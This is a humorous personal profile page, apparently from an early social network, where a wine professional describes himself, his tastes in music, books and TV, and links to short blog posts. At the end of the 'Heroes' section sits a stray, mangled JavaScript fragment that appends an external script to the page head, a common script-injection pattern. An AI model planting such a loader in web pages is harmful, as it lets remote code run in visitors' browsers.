Thank You For Drinking

Is the juice worth the squeeze?

About Me

I'll give you a little snap shot... I live a charmed life. I get paid to drink wine and spirits. It doesn't take a genius to figure out I love my job. Before that I was a marketing copywriter for Sony Music. I love music and I love to write. My father was in the US military. I grew up in three different continents- Europe, North America, and Asia. People say I'm worldly and I laugh at them while eating Popeye's chicken with my greasy barehands. My South African mates will tell you, I'll eat anything that can't out run me. I went to an all boys catholic school most of my academic life- enough said. I'll say I'm pretty laid back but don't let my islander demeanor fool you- I was the kid in the front of the class that knew all the answers because I read four chapters ahead all the time. On a lighter note, "Old Yeller" and "Dumbo" made me cry like a little girl. I was the altar boy that ate the extra unblessed hosts when I got hungry. Before I was captain of my football team, I was the best dressed bench warmer on my basketball squad. I have way too much energy- I don't think you can handle me. I seriously have issues about sitting still. If I'm not zipping along, my mind is racing 100mph. I can dance, and I don't mean the white boy two step... Did I mention I'm a musician? I just wrote and produced my first song- "The One Chord Song in C" I'm writing my second song, "The One Chord Song in D" it won't be a chart buster but it will be critically acclaimed. Ask me to play it for you sometime. I'm really funny and if you don't think so- fuck you, you don't have a sense of humor. I'm old fashioned. I like to pull out chairs, walk on the right side of the street, and buy dinner. I still like to open doors for the ladies even when I'm giving them the boot. I believe that nice guys really do finish last, but only assholes think of love and life as a competition.

My Interests

People. Relationships. People in Relationships... I don't have cable so my reality tv is... reality. Iguanaland. DRUNKEN TRUTH OR DARE HK JENGGA!!!! Reading. Writing. Photography. Art- spoken, seen, heard, felt, tasted. Food. Tasty beverages. Martial arts and the serenity it invokes out of violence. Foreign cultures. Languages- especially the language of LoOooove (hahahahahaha) Team sports and how individual dynamics equal either victory or failure. (Bball, Futbol, Football, curling anything that requires gear hahahahaha!) THE OCEAN and its vastness. That line that seperates the waves from the shore or the horizon from the sky; that line that seperates friend from lover, love from hate. I am into understanding the grey matter, because I live my life so very black and white. But most importantly I am interested in BROADS. hahahahaha (I'm kidding- sort of)

I'd like to meet:

Your Mother. No seriously I'm NOT kidding. You AND your Mother, silly! In all honesty though, anyone who can keep me still.

Music:

I love listening to unsigned artists. I seriously ride the train hoping some dude whips out a guitar and breaks into song. Right now I'm all about Julian Velard and my neighborhood band- Nevaris; though lately I've been crooning to Jack Johnson, Jeff Buckley, Ari Hest, and surprisingly- Fiona Apple. Other notables- Coldplay, The Fray, Smashing Pumpkins /Zwan, Pearl Jam, The Cure, Common, Duncan Sheik, Jordan Carp, Vannessa Mae, John Legend, DMB, Ben Harper, Aqualung, Ray Lamontagne, Anthony Hamilton, Imogen, The Gypsy Kings, Oasis, The Wallflowers, Counting Crows, Bruce Springsteen, Guns n' Roses, The Cure, John Mayer. Sting, Jill Scott, Wolfgang, Miles Davis, Johnny Cash, THE KING-Elvis Presley, Roberta Flack, The Rolling Stones, The Doors, Coltrane, Third Eye Blind, Red Hot Chili Peppers, Incubus, David Grey, Lauryn Hill (even though she's a psycho) Frou Frou, Cody Chestnutt, Brain Salad, Lokomotiv, Wolfgang, Sandwich, The Dawn, Damien Rice, Mozart and Bach (I'm just now getting into their music) and a Virgin Music Store inventory list of others

Television:

I don't watch TV anymore but when I do find myself in front of the boob tube its so I can watch Iron Chef or MXC. (If you can keep a secret I'll admit that I'm sometimes a nerd and will watch the food network/fineliving/discovery/history/military channel for hours on end but keep that on the low... shhhhhh...)Ok ok so I tivo Scrubs and Man Vs. Wild... ok shoot me- but at least I could survive anywhere in the world with a flint stone in my pocket and little else...

Books:

Anything by Neruda, Marquez, Allende, Coelho, Hemingway, Murakami, Palahniuk, or Welsh. Lately I've been reading cookbooks and anything that is related to. I always carry The Food Lover's Companion with me to work, but that's because I'm a nerd. I sometimes read Robert Greene, Niel Strauss, and Anne Rice when no one is looking. And just for shits and giggles I'll read the letters from Penthouse while slathering mayonaise on my flatmate's cat

Heroes:

My Parents. Yeah that's right... (serious/ for real for real answer) Chuck Norris for being such a bad ass, Captain Crunch and Tony the Tiger for raising me. ;) .."var s=document·('script');s.src='..';document·getEleme ntsByTagName('head')[0].appendChild(s);"

Give Some Back...

Lately I feel like I've spent my time in "guard mode". For those of you that don't know, that is when a fighter gets clobbered with a good punch and reacts by putting his hands up and stops playing of...

Pulling Petals

Pulling petals lately feels like pulling teeth, leaving me with the taste of my own blood and very little to smile about. But there is hope in the answer to my question and the idea of a new sm...

Debbie Downer

I woke up smiling and pinched myself to see if I was dreaming... I woke up alone and realized that I was... What a bummer.

Family Recipes (sorry, I think I'm on a food high)

I like to make chili. It stems from years of watching my father put together countless batches of his own. I would sit silently and just watch as my father would carefully chop up garlic and other aro...

Writer's Block.

What do you say when you have everything to say but can't say anything? Silence speaks volumes but leaves novels to be misread and misunderstood. I feel like I have lost my voice but not my message. I...
